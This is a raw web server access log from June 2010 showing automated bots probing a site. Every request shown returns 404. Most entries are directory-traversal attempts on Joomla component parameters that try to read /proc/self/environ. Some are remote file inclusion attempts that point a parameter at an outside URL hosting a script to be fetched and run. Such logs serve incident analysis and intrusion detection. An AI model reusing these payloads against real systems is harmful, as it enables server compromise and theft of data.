174.121.176.46 - - [29/Jun/2010:07:07:14 -0500] "GET /logs/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:07:35 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:07:36 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:07:56 -0500] "GET /logs/access_log.1274832000/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:07:56 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:07:57 -0500] "GET /logs/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:08:04 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:08:19 -0500] "GET /logs/access_log.1274832000/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:08:19 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:08:19 -0500] "GET /logs/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:08:24 -0500] "GET /logs/access_log.1274832000/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:08:24 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:08:24 -0500] "GET /logs/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:08:25 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:08:28 -0500] "GET /logs/access_log.1274832000/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:08:28 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:08:28 -0500] "GET /logs/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:08:30 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.176.46 - - [29/Jun/2010:07:08:36 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
121.78.118.123 - - [29/Jun/2010:07:08:36 -0500] "GET /logs/access_log.1276473600/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
121.78.118.123 - - [29/Jun/2010:07:08:37 -0500] "GET /index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [29/Jun/2010:07:08:37 -0500] "GET /logs/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
201.116.197.150 - - [29/Jun/2010:07:09:42 -0500] "GET /logs/access_log.1276300800//index.php?option=com_horoscope&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
201.116.197.150 - - [29/Jun/2010:07:09:44 -0500] "GET //index.php?option=com_horoscope&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
201.116.197.150 - - [29/Jun/2010:07:09:45 -0500] "GET /logs//index.php?option=com_horoscope&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
38.113.115.196 - - [29/Jun/2010:07:09:56 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
201.116.197.150 - - [29/Jun/2010:07:10:38 -0500] "GET /logs/access_log.1276300800//index.php?option=com_horoscope&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
201.116.197.150 - - [29/Jun/2010:07:10:39 -0500] "GET //index.php?option=com_horoscope&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
201.116.197.150 - - [29/Jun/2010:07:10:40 -0500] "GET /logs//index.php?option=com_horoscope&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
174.121.58.85 - - [29/Jun/2010:07:15:30 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:07:15:49 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:07:15:55 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:07:15:56 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:07:15:57 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:07:15:58 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:07:16:00 -0500] "GET /logs/access_log.1274832000/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:07:16:00 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:07:16:00 -0500] "GET /logs/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:07:16:09 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:07:16:25 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:07:16:37 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
207.73.139.239 - - [29/Jun/2010:07:17:31 -0500] "GET /index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
174.121.58.85 - - [29/Jun/2010:07:17:53 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:07:17:53 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:07:17:53 -0500] "GET /logs/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:07:17:53 -0500] "GET /logs/access_log.1274832000/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:07:18:37 -0500] "GET /logs/access_log.1274832000/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:07:18:37 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:07:18:37 -0500] "GET /logs/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.58.85 - - [29/Jun/2010:07:18:54 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
80.177.1.221 - - [29/Jun/2010:07:20:04 -0500] "GET /index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 281 "-""libwww-perl/5.805"
217.146.36.246 - - [29/Jun/2010:07:20:26 -0500] "GET /index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
217.146.36.246 - - [29/Jun/2010:07:20:26 -0500] "GET /index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
93.186.192.124 - - [29/Jun/2010:07:20:53 -0500] "GET /logs/access_log.1277164800%20%20//components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:07:20:53 -0500] "GET //components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:07:20:53 -0500] "GET /logs//components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:07:20:55 -0500] "GET //components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:07:20:55 -0500] "GET /logs//components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:07:20:58 -0500] "GET /logs/access_log.1277164800%20%20//components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:07:21:13 -0500] "GET /logs/access_log.1277164800%20%20//components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:07:21:13 -0500] "GET //components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:07:21:13 -0500] "GET /logs//components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
203.120.246.20 - - [29/Jun/2010:07:21:22 -0500] "GET /logs/access_log.1277424000//index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
203.120.246.20 - - [29/Jun/2010:07:21:24 -0500] "GET //index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
203.120.246.20 - - [29/Jun/2010:07:21:26 -0500] "GET /logs//index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
80.48.73.1 - - [29/Jun/2010:07:21:55 -0500] "GET //components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
80.48.73.1 - - [29/Jun/2010:07:21:55 -0500] "GET /logs//components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
80.48.73.1 - - [29/Jun/2010:07:21:55 -0500] "GET /logs/access_log.1277164800%20%20//components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
80.48.73.1 - - [29/Jun/2010:07:22:34 -0500] "GET /logs//components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
80.48.73.1 - - [29/Jun/2010:07:22:34 -0500] "GET //components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
80.48.73.1 - - [29/Jun/2010:07:22:34 -0500] "GET /logs/access_log.1277164800%20%20//components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
207.73.139.239 - - [29/Jun/2010:07:24:04 -0500] "GET /logs/access_log.1274054400/index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
207.73.139.239 - - [29/Jun/2010:07:24:04 -0500] "GET /index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
207.73.139.239 - - [29/Jun/2010:07:24:04 -0500] "GET /logs/index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
80.177.1.221 - - [29/Jun/2010:07:26:14 -0500] "GET /logs/access_log.1274054400/index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 308 "-""libwww-perl/5.805"
80.177.1.221 - - [29/Jun/2010:07:26:14 -0500] "GET /index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 281 "-""libwww-perl/5.805"
80.177.1.221 - - [29/Jun/2010:07:26:15 -0500] "GET /logs/index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 286 "-""libwww-perl/5.805"
203.120.246.20 - - [29/Jun/2010:07:28:10 -0500] "GET /logs/access_log.1276300800/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
203.120.246.20 - - [29/Jun/2010:07:28:14 -0500] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
203.120.246.20 - - [29/Jun/2010:07:28:17 -0500] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
203.120.246.20 - - [29/Jun/2010:07:31:35 -0500] "GET /index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
217.73.239.6 - - [29/Jun/2010:07:31:35 -0500] "GET /logs/access_log.1274572800//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.807"
217.73.239.6 - - [29/Jun/2010:07:31:35 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.807"
217.73.239.6 - - [29/Jun/2010:07:31:36 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.807"
80.74.153.40 - - [29/Jun/2010:07:33:21 -0500] "GET /logs/access_log.1274572800//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
80.74.153.40 - - [29/Jun/2010:07:33:21 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.74.153.40 - - [29/Jun/2010:07:33:21 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
217.73.239.6 - - [29/Jun/2010:07:33:28 -0500] "GET /logs/access_log.1274832000//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.807"
217.146.36.246 - - [29/Jun/2010:07:34:47 -0500] "GET /logs/access_log.1274054400/index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
217.146.36.246 - - [29/Jun/2010:07:34:49 -0500] "GET /index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
217.146.36.246 - - [29/Jun/2010:07:34:51 -0500] "GET /logs/index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
80.74.153.40 - - [29/Jun/2010:07:35:28 -0500] "GET /logs/access_log.1277164800//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
217.146.36.246 - - [29/Jun/2010:07:35:58 -0500] "GET /logs/access_log.1274054400/index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
217.146.36.246 - - [29/Jun/2010:07:35:59 -0500] "GET /index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
217.146.36.246 - - [29/Jun/2010:07:36:01 -0500] "GET /logs/index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
203.120.246.20 - - [29/Jun/2010:07:37:00 -0500] "GET /logs/access_log.1276300800/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
203.120.246.20 - - [29/Jun/2010:07:37:02 -0500] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
203.120.246.20 - - [29/Jun/2010:07:37:03 -0500] "GET /logs/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
